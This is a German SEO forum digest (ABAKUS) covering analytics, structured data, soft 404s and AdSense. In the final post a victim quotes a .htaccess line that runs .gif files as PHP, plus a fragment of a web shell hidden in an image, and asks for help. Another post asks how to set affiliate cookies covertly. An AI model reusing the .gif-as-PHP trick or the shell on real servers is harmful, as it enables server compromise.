Dann haben wir die passende Dienstleistung für Dich.

Bei der Backlinkanalyse werden die eingehenden Links Deiner Website von unseren ABAKUS Off-Page Experten durchleuchtet. Dabei kommt es aber nicht auf die Quantität, sondern vielmehr auf die Qualität der Backlinks an. Nach Abschluss der Analyse bekommst Du die Ergebnisse schriftlich ausgehändigt. Außerdem entwerten wir mit der Disavow-Liste Deine schadhaften Links und sorgen für ein hochwertiges Backlinkprofil.

Kontaktiere uns bei Interesse. Wir freuen uns auf Deine Nachricht!

Viele Grüße

Dein ABAKUS-Team
Tel.: +49 (0)511 ? 300 325-0

Statistik: Verfasst von ABAKUS Team — 16.03.2023, 13:59



Seitenaufrufe einer best. URL in Google Analytics 4 Hi zusammen,

ich würde gerne in einem Custom Bericht in Google Analytics 4 die Seitenaufrufe einer bestimmten URL innerhalb des jeweils letzten Quartals darstellen. Im Bericht enthalten sollen die Seitenaufrufe aufgesplittet nach Land (Herkunft des Users) und eben die Gesamtzahl der Seitenaufrufe.

Ich stoße dabei auf 2 Probleme:

1.) Immer wenn ich versuche als Zeitraum das letzte Quartal auszuwählen gibt mir Analytics eine Fehlermeldung mit dem
Hinweis:

"Ungültiger Zeitraum
In dieser explorativen Datenanalyse wurde ein Zeitraum angepasst, damit weiterhin gültige Daten geliefert werden. Die Zeiträume dieser explorativen Datenanalyse dürfen nicht mehr als Januar 14, 2023 Tage zurückliegen und nicht jünger sein als der yesterday. Falls eines der Segmente Nutzerdaten enthält, wird der Zeitraum automatisch auf 93 Tage ab dem Startdatum begrenzt."
==> eines der Segmente enthält doch Nutzerdaten, da ich Nutzer einschließe, welche eine best. URL aufgerufen haben???

2.) Die Zahlen unterscheiden sich von den Zahlen, die mir Google Analytics UA liefert - woran liegt das?

Lieben Dank für eure Hilfe!

Statistik: Verfasst von cosmico — 14.03.2023, 10:31



Erfahrungen mit Sales Viewer oder ähnlichen Tools Moin!

Hat jemand Erfahrungen mit https://www.salesviewer.com/de/ oder ähnlichen Tools, die versprechen, die Besucher der eigenen Webseite bestimmten Unternehmen zuzuordnen? Funktioniert das verlässlich? Danke!

Statistik: Verfasst von Sephirio — 13.03.2023, 17:18



Websitename - schema.org - Sprachversionen Hallo SEO Profis!

Ich habe folgendes Problem:

Bei einem meiner Projekte gibt es eine Root Domain xyz.de, die User dann - je nach Browsersprache - auf die Startseite des jeweiligen Sprachverzeichnisses (/de oder /en) weiterleitet.

Das Problem ist nun, dass in den Deutschen Serps als Websitename (seit kurzem auch am Desktop neben dem Favicon) ein Teil des Englischen Seo Titles (statt dem Deutschen) ausgespielt wird. Ist natürlich suboptimal.

Die angedachte Lösung mittels strukturierten Daten ("@type" : WebSite , "name" : Beispiel" , "url" : "xyz") scheitert daran, dass das ja nur auf Domainebene möglich ist und nicht auf Verzeichnisebene (/de und /en). Die Root Domain ist aber wie erwähnt gar nicht aufrufbar, sondern leitet via 302 weiter.

Kann mir vielleicht jemand von Euch sagen, ob die oben beschriebene Auszeichnung auch auf den Startseiten der 2 Sprachverzeichnisse etwas bringt? Oder hat jemand eine andere Lösung für dieses Problem?

Vielen Dank im Voraus für Eure Hilfe! :-)

Leo

Statistik: Verfasst von Leo.Zach — 10.03.2023, 16:55



Darum ist Google (dank KI) dem Untergang geweiht Auch wenn es gewagt klingen mag dass ich Google einen Untergang attestiere, ist diese Prophezeihung dann doch nicht unrealistisch.

Google profitiert seit Jahren den Suchmaschinenmarkt und bestimmt damit nicht nicht nur, was für das Rating relavant scheint, sondern nutzt auch über den exorbitant hohen Verbreitungsgrad des Chrome Browsers, was augenscheinlich gut ist für den User. Über letzteres kann man aber geteilter Meinung sein, allerdings, und das muss man Google zu Gute halten, ist Google seit vielen Jahren die treibende Kraft, wenn es darum geht, dass man seine Seite für eine bessere Ladezeit optimiert.

Nichtsdestotrotz profitiert Google zumindest bislang noch von der Marktbeherrschung und dem Nutzungsgrad. Beides ist aber nicht zwingend ein Nachweis dafür, dass Google in Sachen Qualität der Suchergebnisse besser wäre als andere Suchmaschinen. Zumal meinen Recherchen nach sehr viel Content bei Google gar keine Relevanz mehr findet. Google scheint sich nur mehr noch auf auf die aktuellen Interessen zu konzentrieren. Will heißen, Content für den es kein angemessenes Interesse gibt wird noch nicht mal gecrawlt, geschweige denn indexiert und fliegt im Falle dessen aus dem Index. Das gleiche Schema scheint für Google auch für Content zu gelten, den es in leicht verändeter Form schon zig-fach anderswo gibt.

Das klingt auf den distanzierten Blick zunächst mal logisch und nach betriebswirtschaftlicher Auffassung auch gerechtfertigt. Warum Resourcen für etwas aufwenden für das sich, sorry, keine Sau interessiert? An dieser Auffassung ist sicherlich was dran. Zumal das Bereitstellen technischer Resourcen im Sinne von Hardware und Stromverbrauch unweigerlich eine Relevanz hat. Nun ist es aber mal so, dass man etwas finden will, wenn man nach etwas sucht und seien es Informationen, die nicht jede Sau interessiert und der Content dafür ur-alt scheinen mag. Google hat sich aber eine auf die Fahne geschrieben (u.a.) eine Suchmaschine zu sein. Das erwartet, dass man darüber relevante Inhalte findet und das ungeachtet des aktuellen Bedarfs danach.

Was mir ebenso seit inzwischen schon seit gefühlt Tausend Jahren auffällt, ist dass die konservativ klingende Keyword Suche nicht die gleichen Suchergebnisse hervorbringt als die Dummy like(ende) Wie Wo Was Warum Weshalb Warum Suchanfrage. Ich sehe mich durrch diese augenscheinliche Praktik in erheblichem Maße auf einen niedrigen Intelligenzquotienten reduziert, wenn ich jede Suchanfrage so stellen muss, wie ein Idiot der von tuten und blasen keine Ahnung hat.

Nevertheless, es geht um die Behauptung, dass ich Google einen Niedergang vorhersage. Und dazu trägt maßgeblich der aktuelle Hype rundum KI, bzw. AI bei. Nicht unbedingt weil diese Art Suche besser oder schneller wäre als die konservative Suche, sondern weil sich sich der Dummy damit "intelligentere" Antworten im Sinne von auf sein geistig angepasstes Niveau ein besses Suchergebniss erwartet. Will heißen, der (dumme) User will bereits in den Suchergebnissen das lesen können, was er auch versteht und eben nicht den Content den sich Google aus dem Content einer Seite zieht. Das würde folglich bedeuten, wenn es denn so etwas gäbe, dass künstliche Intelligenz die Suchergebnisse, bzw. die Snippets so umtextet, dass selbst der verblödete User versteht, worum es geht. (Mindestens 8 von 10 sind verblödet.).

Wenn meine anmaßend wirkende Behauptung richtig ist, würde das ein massives Umdenken erfordern, wie Google mit Suchanfragen umgeht. Google setzt zwar bereits jetzt schon voraus, dass der Suchende verblödet ist und nur wie wo was warum Fragen stellen kann, aber diese vermeintliche Intelligenz endet mit der fehlenden Interpretion der Suchergebnisse. Ich hätte mir von Google schon viel früher erwartet, dass Google in der Lage wäre die Interessen eines Nutzers richtig zu deuten. Letztlich funktioniert Google aber nur in Form eines Suchwort Vergleichs, so dass man KI, bzw. AI bei Google nicht wirklich ernst zu nehmen scheint.

Vor dem Hintergrund, dass sicher hinter Google ein gewaltiger Funktionsapparat befindet, der systembedingt nur sehr schwerfällig reagieren kann, gebe ich wenig Hoffnung darauf, dass Google in der Lage ist, sich kurzfristig an die veränderten (KI/AI) Bedingungen anzupassen.

Statistik: Verfasst von supervisior — 09.03.2023, 13:19



Affiliate-Cookie setzen ohne Affiliate-Link Was will ich mit dieser kryptischen Überschrift sagen?

Ich habe folgende Situation. Ich habe einen Deeplink auf einen Shop, der ein eigenes Affiliate-Programm betreibt (also nicht über ein Netzwerk). Bei diesem Programm bin ich auch angemeldet. Über dieses Programm kann man aber ausschließlich irgendwelche Banner und vorgegebene Textlinks beziehen. Einen Deeplink-Generator gibt es nicht.

Wie kann ich es erreichen, dass ich für meinen Deeplink (der kein Affiliate-Link ist) trotzdem Provisionen bekomme? Ich dachte an sowas wie einen neuen Tab per JS öffnen, zunächst einen vorgegebenen Affiliate-Textlink aus dem Partnerprogramm darin aufrufen und erst dann den Deeplink. Aber geht das überhaupt mit JS? Und optimal für den Nutzer ist das sicherlich auch nicht, wenn er erst die eine und dann eine andere Seite aufgerufen bekommt. Und würde das auch mobil funktionieren???

Statistik: Verfasst von wsis — 10.03.2023, 12:25



Webshop integrieren in "informationale" Website...? :-P Gemeint ist informational. Es gibt ja den Gedanken, dass Google die Websites u. a. in informationale und in transaktionale Seiten einteilt, also Seiten, die entweder Infos bieten (z. B. Ratgeber-Seiten) oder zu einer Interaktion animieren (z. B. Shops). Das zu vermischen, sollte man bleiben lassen, heißt es. Finde ich auch logisch. Zumindest, wenn man auf Top-Rankings hofft. Überlege allerdings, ob dem tatsächlich so ist - und was im schlimmsten Fall passiert, wenn man das tut. Ob der Shop einfach brach liegt oder ob die informationalen Seiten zusätzlich abgestraft werden. Deswegen der Gedanke mit der Sub-Domain.
> Auf der, wie gesagt, informationalen Website habe ich Seiten wie z. B. diese hier: https://yoga-knigge.de/yoga/kleidung/

International? Ich finde hier nur 85 Unterseiten!? Ich glaube du machst dir zu diesem Projekt viel zu viele Gedanken.

Statistik: Verfasst von RBK — 08.03.2023, 08:35



Extrem hoher "Google-Traffic" für ein paar Minuten Ja, am 06.03., allerdings am frühen Abend, zwischen 18 und 19 Uhr.

Du fragst nach 20 Uhr, da dann die Filme im Fernsehen laufen?
> Ich hab's gestern zufällig live gesehen.

6.3. nach 20.00 Uhr?

Statistik: Verfasst von RBK — 08.03.2023, 08:37



Google AdWords: Eigenes Konto für jeden Franchisenehmer?Danke für deine Meinung.
Ich denke für diesen Kunden ist es tatsächlich besser, alles über ein Konto laufen zu lassen =)
Rankingrelevanter Content under the fold Ich habe auf meiner Website meinen Seo-relevanten Text unter meinen Produkten, sprich gaaanz weit unten.

Wo soll der Text sonst hin, sähe oben nix aus und ließt auch keiner!

Aber nun in einem Video "gelernt" (SEO-Fachmann): Content, der nicht auf den ersten Blick sichtbar ist wird entwertet. Wurde auch von Google bestätigt!

Was soll ich davon halten? Richtig so? Was wäre meine Best Practise?


Vielen Dank für konstruktive Antworten.

Statistik: Verfasst von BackinBlack — 20.12.2021, 16:56



Nur 1 Website oder besser 2? Hallo!
Folgende Frage beschäftigt mich schon seit einiger Zeit:
Wir sind eine Wirtschaftsberatung in München und vermitteln seit über 17 Jahren Schweizer Bankkonten mit und ohne Mindesteinlage. (I.d.R. verlangen Schweizer Banken von Nicht-Schweizern eine Mindesteinlage von bis zu 1 Million CHF!)
Nachdem eine neue Seite schon längst überfällig ist, wollen wir nun endlich eine neue Website kreieren lassen.

Meine Frage hierzu:
Da wir auch häufig Anfragen aus dem Ausland bekommen, würde mich interessieren, was bezüglich des Rankings und der Auffindbarkeit der Seite sinnvoller ist:
a) Eine Hauptseite in Deutsch mit einem Button zur Sprachauswahl für Engisch, Französich, Italienisch, Spanisch, Russisch u.a.
oder
b) Eine Seite in Deutsch und eine separate Seite in Englisch mit Auswahlmöglichkeit für andere Sprachen.

Noch eine weitere Frage:
Ich habe von einem indischen Webdesigner ein sehr interessantes Angebot erhalten (mit wirklich sehr schönen Referenzseiten die auch online sind). Welche Nachteile könnten hier gegeben sein? (Er bietet nur Webdesign an, kein SEO. Er gibt auch offen zu, dass er nur Grundkenntnisse in SEO hat und deshalb SEO auch nicht anbietet.)

Vielen Dank im Voraus für Eure hilfreichen Antworten!

John

Statistik: Verfasst von john2253xx — 20.12.2021, 16:12



SEO-Texte mit gleicher Themenrelevanz Hallo zusammen,
ich hatte mich gefragt, wie man am besten damit umgehen soll, wenn Z. B. die Startseite eine identische inhaltliche Abdeckung wie eine Kategorie hat.

als Beispiel:
Startseite: umkehrosmoseanlage.com soll auf Umkehrosmoseanlage ranken.
Kategorieseite: umkehrosmoseanlage.com/Osmoseanlagen soll auf Osmoseanlage ranken.

Da beides im Grunde dasselbe ist, haben die Texte auch den thematisch gleichen Inhalt führt das zu Problemen, wenn ich zweimal das gleiche beschreib nur mit anderen Wörtern?

Habt ihr schon Erfahrungen damit gemacht?
Ich freue mich auf eure Antworten. :D

Mit freundlichen Grüßen
Elias

Statistik: Verfasst von E.Braun — 20.12.2021, 09:40



Woran merkt man, dass man alt wird? Woran merkt man, dass man alt wird?

Nein, nicht an den Falten, sondern daran, dass diejenigen deren Fan man mal war oder auch noch ist, nach und nach wegsterben. Jetzt gibt's davon schon wieder einen weniger. Buuuuuhäääää :(

https://www.stern.de/kultur/musik/musik ... 39622.html

Statistik: Verfasst von supervisior — 20.12.2021, 15:37



Wieviele Ebenen sind sinnvoll -und- Domainumzug und dann

Ich will versuchen eine Weiterleitung nicht nur global auf die neue Seite, sondern auf jede einzelne Adresse zu setzen, suche dazu aber noch die richtigen Befehle für htaccess.
Frage: Wenn ich umgezogen bin und eine Weiterleitung von alter zu neuer Domain in der htaccess angebracht habe, reiche ich dann eine Sitemap für die neue Seite bei Google ein oder muss ich warten, bis Google über die Weiterleitung die Adressen gefunden hat?

Danke.
Umziehen ohne Umleitung wird dir nicht das bringen was du dir erhoffst. selbst bei Umleitungen gibt es einen ca 10% Verlust.
Ebenen ich würde es nicht übertreiben. Bau die Seite so auf das sie den Besucher gefällt.

Statistik: Verfasst von arnego2 — 19.12.2021, 15:10



Alternative zu "peek.link" um Social Media Previews zu generieren Hallo zusammen

Kennt da jemand was brauch bares?

peek.link spinnt die ganze Zeit und die damit abgekürzten Links haben absuederweise nur http:// statt https:// .... muss mich fragen warum - evtl. weiss auch das jemand von euch, wo da der Grund liegen könnte.

Aber heutzutage - nun ja - ist das doch schon ein wenig veraltet, keine verschlüsselten Verbindungen zu verwenden - oder?

Vielen DAnk für eure FEedbacks.

Statistik: Verfasst von mits — 02.12.2021, 16:13



Was kann man bei Soft 404 Fehlermeldungen tun? Hallo Zusammen,

ich habe seit einiger Zeit für unseren Onlineshop viele Seiten, für die ich Fehlermeldung Soft 404 erhalte. Leider bringt mich der von Google verlinkte Hinweistext nicht wirklich weiter.

Bei andere Seiten (Domains) mit anderen Themen habe ich dieses Problem nicht. Es scheint also etwas damit zu tun zu haben, dass es im Shop nicht um Textbeiträge sondern um Produkte geht.

Hat jemand eine Idee, woran das liegen kann bzw. wie ich die Ursache dafür herausfinden kann?

Viele Grüße - Harald

P.S.: Leider kann ich die Internetadresse (noch) nicht direkt angeben, da ich dafür mindestens 5 Beiträge geschrieben haben muss... :(

Statistik: Verfasst von haraldundandrea — 25.11.2021, 15:21



Adsense Account umziehen in anderes google Konto? Hallo!

Historisch bedingt habe ich ein Adsense Konto, dass sich in einem anderen Google Konto befindet, als mein Adwords und Analytics. Ist schon mehr als 10 Jahre so (weiß ehrlich gesagt auch gar nicht mehr warum) - ich hatte aber immer auch nur dieses eine Adsense Konto (sollte also richtlinienkonform sein).

Damit das etwas praktischer verwendbar wird, würde ich jetzt gern alles in einem Google Konto zusammenführen.

Wie ich gelesen habe ist es wohl nicht möglich, mehrere Google Konten zusammenzuführen.

Adsense Konto auf "andere Person" übertrage geht wohl auch nicht - hier wäre es aber eigentlich die gleiche Person.

Kriege ich das Adsense Konto irgendwie rüber in meinen anderen Account (den mit Adwords und Analytics), den ich hauptsächlich nutze, oder ist die einzige Möglichkeit Adsense Konto schließen und im Hauptaccount ein Neues öffnen?

Hat da jemand Erfahrungswerte?

Lieben Gruß
Patty

Statistik: Verfasst von shoppi — 14.12.2021, 09:52



AddType application/x-httpd-php .gif Hallo
obiges war im "root" Pfad zum htdocs/ Verzeichnis in einer .htaccess Datei geschrieben und im images Verzeichnis lag eine satshell.gif, die erst durch Öffnen mit einem Texteditor einen php Code freigab. Ich habe den Code und könnte den Posten. Wer oder was hat das in mein Rootverzeichnis gelegt ? Ich kann das leider nicht interpretieren. Es könnte Schadcode sein ? Ist das hier interessant oder soll ich den Beitrag wieder löschen. Was könnte der Code machen ?

Ein kleiner Teil des Scriptes beschreibt sowas ?

  STNC WebShell v$version  id: ".cmd("id")."
uname: ".uname()."
your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."
".hidden("action","save").hidden_pwd()."